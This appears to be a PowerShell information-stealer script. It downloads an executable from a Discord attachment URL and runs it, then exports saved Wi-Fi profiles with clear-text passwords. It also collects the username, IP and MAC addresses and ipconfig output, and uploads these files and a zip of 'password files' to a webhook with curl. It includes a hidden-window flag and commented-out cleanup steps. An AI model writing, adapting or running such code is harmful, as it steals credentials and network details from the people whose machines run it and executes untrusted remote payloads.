#powershell -w hidden -nop -noni
#pip install pycryptodomex pywin32 browser-cookie3 requests
Invoke-WebRequest 'https://cdn.discordapp.com/attachments/975173196103966800/1435755657705029790/fun.exe?ex=690d1f27&is=690bcda7&hm=b2aad148ae82f9f7533f919ccdbe006c76d041af5dab43587d910bf9de9d3466&' -OutFile 'program.exe'; & ".\program.exe"
$e="$env:LOCALAPPDATA\Temp"; netsh wlan export profile key=clear folder=$e | Out-Null; Get-ChildItem "$e\Wi-Fi*.xml" | %{$x=[xml](gc $_); "SSID:$($x.WLANProfile.SSIDConfig.SSID.name) | Password:$($x.WLANProfile.MSM.security.sharedKey.keyMaterial)"} > "$e\wifi.txt"

#scrape the localappdata for password files
$zip="$env:TEMP\funny_stuff_folder.zip"
$whoami_content = whoami

ipconfig /all | Out-File -FilePath "$e\ipcfg.txt" # save ipconfig as a file

$mac=(ipconfig /all | findstr /R "Physical")
$ipv6=(ipconfig /all | findstr /R "IPv6")
$ipv4=(ipconfig /all | findstr /R "IPv4")

#send to discord

#send http
Start-Process curl.exe -F "content=Passwords for: $whoami_content | IP: $ipv4[0] | Public: $ipv4[1] | MacAddress: $mac | IPv6: $ipv6 \n@everyone" -F "file1=@$zip" -F "file2=@$e\wifi.txt" -F "file3=@$e\ipcfg.txt" $wh > $null 2>&1


# cleanup

#Remove-Item -Path "$e\wifi.txt"
#Remove-Item -Path "$e\ipcfg.txt"
#Remove-Item -Path "$zip"
#exit quickly
#taskkill /F /IM pwsh.exe /IM powershell.exe 2>$null 
#echo sent!
